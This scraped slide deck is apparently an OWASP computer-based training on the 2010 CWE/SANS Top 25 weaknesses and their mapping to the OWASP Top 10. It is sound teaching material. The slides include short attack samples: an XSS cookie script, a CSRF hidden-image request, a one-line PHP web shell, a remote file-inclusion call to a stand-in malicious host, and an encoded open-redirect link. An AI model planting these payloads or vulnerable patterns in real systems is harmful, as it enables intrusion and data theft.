Upload
anson
View
192
Download
3
Tags:
Embed Size (px)
DESCRIPTION
OWASP Education Computer based training. 2010 CWE/SANS Top 25 with OWASP Top 10 and PCI DSS V2 Mapping. Keith Turpin The Boeing Company OWASP Secure Coding Practices Lead OWASP Global Projects Committee [email protected]. Nishi Kumar IT Architect Specialist, FIS - PowerPoint PPT Presentation
Citation preview
The OWASP Foundationhttp://www.owasp.org
OWASP EducationComputer based training
2010 CWE/SANS Top 25 with OWASP Top 10 and PCI DSS V2 Mapping
Nishi KumarIT Architect Specialist, FISOWASP CBT Project Lead
OWASP Global Industry [email protected]
Keith TurpinThe Boeing Company
OWASP Secure Coding Practices LeadOWASP Global Projects Committee
2
Objectives
Provide an overview of the 2010 CWE/SANS Top 25
Discuss mapping relationships between CWE/SANS Top 25, OWASP Top 10 for 2010 and PCI DSS V2
Understand the CWE/SANS Top 25 weaknesses andhow to remediate them
Organizations
MITRE - http://www.mitre.org/The MITRE Corporation is a not-for-profit organization that manages several Federally Funded Research and Development Centers. Mitre currently runs various IT security projects including the Common Weakness Enumeration (CWE) and it is the official source for the CWE/SANS Top 25 Most Dangerous Software Errors.
CWE Database - http://cwe.mitre.org/
SANS - http://www.sans.org
The SysAdmin, Audit, Network, Security (SANS) Institute operates as a commercial research and education company. SANS is well known for its Internet Storm Center, its comprehensive list computing security training programs and its work with Mitre on the CWE/SANS Top 25 Most Dangerous Software Errors.
3
Selection and Ranking
Builds on the original 2009 version
Methodology - Qualitative rather than quantitative
Factors in ranking - Prevalence and Severity
Initially started with 41 candidate weaknesses
4
5
2010 CWE/SANS Top 25Rank ID Name
[1] CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
[2] CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
[3] CWE-120 Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
[4] CWE-352 Cross-Site Request Forgery (CSRF)[5] CWE-285 Improper Authorization[6] CWE-807 Reliance on Untrusted Inputs in a Security Decision[7] CWE-22 Improper Limitation of a Pathname to a Restricted Directory
('Path Traversal')[8] CWE-434 Unrestricted Upload of File with Dangerous Type[9] CWE-78 Improper Neutralization of Special Elements used in an OS
Command ('OS Command Injection')[10] CWE-311 Missing Encryption of Sensitive Data[11] CWE-798 Use of Hard-coded Credentials[12] CWE-805 Buffer Access with Incorrect Length Value
6
SANS CWE Top 25
Rank ID Name[13] CWE-98 Improper Control of Filename for Include/Require
Statement in PHP Program ('PHP File Inclusion')[14] CWE-129 Improper Validation of Array Index[15] CWE-754 Improper Check for Unusual or Exceptional Conditions[16] CWE-209 Information Exposure Through an Error Message[17] CWE-190 Integer Overflow or Wraparound[18] CWE-131 Incorrect Calculation of Buffer Size[19] CWE-306 Missing Authentication for Critical Function[20] CWE-494 Download of Code Without Integrity Check[21] CWE-732 Incorrect Permission Assignment for Critical Resource[22] CWE-770 Allocation of Resources Without Limits or Throttling[23] CWE-601 URL Redirection to Untrusted Site ('Open Redirect')[24] CWE-327 Use of a Broken or Risky Cryptographic Algorithm[25] CWE-362 Concurrent Execution using Shared Resource with
Improper Synchronization ('Race Condition')
7
OWASP Top 10 & SANS CWE Top 25 mapping
https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
http://www.sans.org/top25-software-errors/http://cwe.mitre.org/top25/
A1: Injection [2] CWE-89:
[9] CWE-78:
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
A2: Cross-Site Scripting (XSS)
[1] CWE-79: Improper Neutralization of Input During Web Page Generation('Cross-site Scripting')
A3: Broken Authentication and Session Management
[19] CWE-306:[11] CWE-798:
Missing Authentication for Critical FunctionUse of Hard-coded Credentials
A4: Insecure Direct Object References [5] CWE-285:[6] CWE-807:
[7] CWE-22:
Improper AuthorizationReliance on Untrusted Inputs in a Security DecisionImproper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
A5: Cross-Site Request Forgery (CSRF) [4] CWE-352: Cross-Site Request Forgery (CSRF)
8
OWASP Top 10 & SANS CWE Top 25 mapping
A6: Security Misconfiguration [16] CWE-209: Information Exposure Through an Error Message (Only partially covers OWASP Risk)
A7: Insecure Cryptographic Storage
[10] CWE-311: [24] CWE-327:
Missing Encryption of Sensitive Data Use of a Broken or Risky Cryptographic Algorithm
A8: Failure to Restrict URL Access
[5] CWE-285:
[21] CWE-732:
Improper Authorization (Also listed with OWASP A-4)Incorrect Permission Assignment for Critical Resource (CWE-732 covers a broader scope than OWASP A8)
A9: Insufficient Transport Layer Protection
[10] CWE-311:
[24] CWE-327:
Missing Encryption of Sensitive Data (Also listed with OWASP A-7)Use of a Broken or Risky Cryptographic Algorithm (Also listed with OWASP A-7)
A10: Unvalidated Redirects and Forwards
[23] CWE-601: URL Redirection to Untrusted Site ('Open Redirect')
9
SANS CWE Top 25The following do not directly map to the OWASP Top 10 2010
[3] CWE-120: Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
[8] CWE-434: Unrestricted Upload of File with Dangerous Type
[12] CWE-805: Buffer Access with Incorrect Length Value
[13] CWE-98: Improper Control of Filename for Include/Require Statement in PHP Program ('PHP File Inclusion')
[14] CWE-129: Improper Validation of Array Index
[15] CWE-754: Improper Check for Unusual or Exceptional Conditions
[17] CWE-190: Integer Overflow or Wraparound
[18] CWE-131: Incorrect Calculation of Buffer Size
[20] CWE-494: Download of Code Without Integrity Check
[22] CWE-770: Allocation of Resources Without Limits or Throttling
[25] CWE-362: Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')
Mapping Considerations
SANS CWE Top 25 is only a fraction of the full CWE list of weaknesses
SANS CWE Top 25 target both web and non-web applications
OWASP defines ten risks focused on web applications
OWASP's list tends to have broader weaknesses - made up of several specific vulnerabilities
PCI DSS Requirements point to both as industry best practices
10
[1] CWE-79Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
11
Try this in your browser: <script>javascript:alert(document.cookie)</script>
[1] CWE-79Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
12
E.g. output encoding < becomes <, > becomes > & becomes & and " becomes " <script> -> <script> (markup)
[2] CWE-89Improper Neutralization of Special Elements used in an SQL Command('SQL Injection')
13
14
[2] CWE-89Improper Neutralization of Special Elements used in an SQL Command('SQL Injection')
Example: C
char last_name[20]; ...................................Declare array with 20 character limitprintf ("Enter your last name: ");scanf ("%s", last_name); ...........................Get input (no limit) and store in array
The software does not limit the size of the name entered by the user, so an entry of more than 20 characters will cause a buffer overflow, since the "last_name" array can only hold 20 characters
[3] CWE-120Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
15
[3] CWE-120Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
16
Example of a legitimate request:http://example.com/app/transferFunds?amount=1500&destinationAccount=4673243243
Example or a forged request using a hidden image tag:<img src=http://example.com/app/transferFunds?amount=1500&destinationAccount=
attackersAcct# width="0" height="0" />
[4] CWE-352Cross-Site Request Forgery (CSRF)
17
[4] CWE-352Cross-Site Request Forgery (CSRF)
18
[5] CWE-285 Improper Authorization
19
[5] CWE-285 Improper Authorization
20
[6] CWE-807Reliance on Untrusted Inputs in a Security Decision
21
[6] CWE-807Reliance on Untrusted Inputs in a Security Decision
22
[7] CWE-22Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
23
[7] CWE-22Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
24
[8] CWE-434Unrestricted Upload of File with Dangerous Type
25
Example: PHP<?phpsystem($_GET['cmd']);?>
[8] CWE-434Unrestricted Upload of File with Dangerous Type
26
[9] CWE-78Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
27
28
[9] CWE-78Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
[10] CWE-311Missing Encryption of Sensitive Data
29
[10] CWE-311Missing Encryption of Sensitive Data
30
[11] CWE-798Use of Hard-coded Credentials
31
[11] CWE-798Use of Hard-coded Credentials
32
[12] CWE-805Buffer Access with Incorrect Length Value
33
[12] CWE-805Buffer Access with Incorrect Length Value
34
[13] CWE-98Improper Control of Filename for Include/Require Statement in PHP Program ('PHP File Inclusion')
35
Example: PHP$dir = $_GET['module_name'];include($dir . "/function.php");
Malicious call to a remote file: /victim.php?module_name=http://malicious.example.com
[13] CWE-98Improper Control of Filename for Include/Require Statement in PHP Program ('PHP File Inclusion')
36
[14] CWE-129Improper Validation of Array Index
37
Example: Javapublic String getValue(int index) {return array[index];}
If index is outside of the range of the array, this may result in an ArrayIndexOutOfBounds Exception being raised
[14] CWE-129Improper Validation of Array Index
38
[15] CWE-754Improper Check for Unusual or Exceptional Condition
39
Example: Java(Bad Code)Example Language: Java String itemName = request.getParameter(ITEM_NAME);if (itemName.compareTo(IMPORTANT_ITEM) == 0) {
...}
The code does not check to see if the string returned by getParameter() is null before calling the member function compareTo(), potentially causing a NULL dereference.
[15] CWE-754Improper Check for Unusual or Exceptional Condition
40
[16] CWE-209Information Exposure Through an Error Message
41
Example: Javatry {
/.../} catch (Exception e) { System.out.println(e);}If this output is redirected to a web user, this may represent a security problemIn the following example, sensitive information might be printed depending on the exception that occurs. If an exception related to SQL is handled by the catch, then the output might contain sensitive information such as SQL query structure or private information.
[16] CWE-209Information Exposure Through an Error Message
42
[17] CWE-190Integer Overflow or Wraparound
43
Example: Cnresp = packet_get_int();if (nresp > 0) {response = xmalloc(nresp*sizeof(char*));for (i = 0; i > nresp; i++) response[i] = packet_get_string(NULL);}
If nresp has the value 1073741824 and sizeof(char*) has its typical value of 4, then the result of the operation nresp*sizeof(char*) overflows, and the argument to xmalloc() will be 0, causing the subsequent loop iterations to overflow the heap buffer response
[17] CWE-190Integer Overflow or Wraparound
44
[18] CWE-131Incorrect Calculation of Buffer Size
45
Example: Cint *id_sequence;id_sequence = (int*) malloc(3);if (id_sequence == NULL) exit(1);id_sequence[0] = 13579;id_sequence[1] = 24680;id_sequence[2] = 97531;
The size parameter used during the malloc() call is set to '3' which results in a buffer of 3 bytes. The intent was to create a buffer that holds three ints, and in C, each int requires 4 bytes, so an array of 12 bytes is needed. Executing the above code could result in a buffer overflow as 12 bytes of data is being saved into 3 bytes worth of allocated space
[18] CWE-131Incorrect Calculation of Buffer Size
46
[19] CWE-306Missing Authentication for Critical Function
47
[19] CWE-306Missing Authentication for Critical Function
48
[20] CWE-494Download of Code Without Integrity Check
49
Example: Java URL[] classURLs= new URL[]{new URL("file:subdir/")};URLClassLoader loader = new URLClassLoader(classURLs);Class loadedClass = Class.forName("loadMe", true, loader);
This code does not ensure that the class loaded is the intended one, for example by verifying the class's checksum.
[20] CWE-494Download of Code Without Integrity Check
50
[21] CWE-732Incorrect Permission Assignment for Critical Resource
51
[21] CWE-732Incorrect Permission Assignment for Critical Resource
52
[22] CWE-770Allocation of Resources Without Limits or Throttling
53
Example: C and C++ sock=socket(AF_INET, SOCK_STREAM, 0);while (1) {newsock=accept(sock, ...);printf("A connection has been accepted\n");pid = fork();}
This code allocates a socket and forks each time it receives a new connection. The program does not track how many connections have been made, and it does not limit the number of connections. A large number of connections could cause the system to run out of resources
[22] CWE-770Allocation of Resources Without Limits or Throttling
54
[23] CWE-601URL Redirection to Untrusted Site ('Open Redirect')
55
Example: PHP $redirect_url = $_GET['url'];header("Location: " . $redirect_url);
This page could be used as part of a phishing scam by initialing on a trusted domain, but redirecting users to a malicious site. An attacker could supply a user with the following link:
http://example.com/example.php?url=http://malicious.example.com
This is the same URL only obfuscated with URL encoding to mask the off site redirect: http://example.com/example.php?url=%68%74%74%70%3a%2f%2f%6d%61%6c%69%63%69%6f%75%73%2e%65%78%61%6d%70%6c%65%2e%63%6f%6d
[23] CWE-601URL Redirection to Untrusted Site ('Open Redirect')
56
[24] CWE-327Use of a Broken or Risky Cryptographic Algorithm
57
[24] CWE-327Use of a Broken or Risky Cryptographic Algorithm
58
[25] CWE-362Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')
59
[25] CWE-362Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')
60
61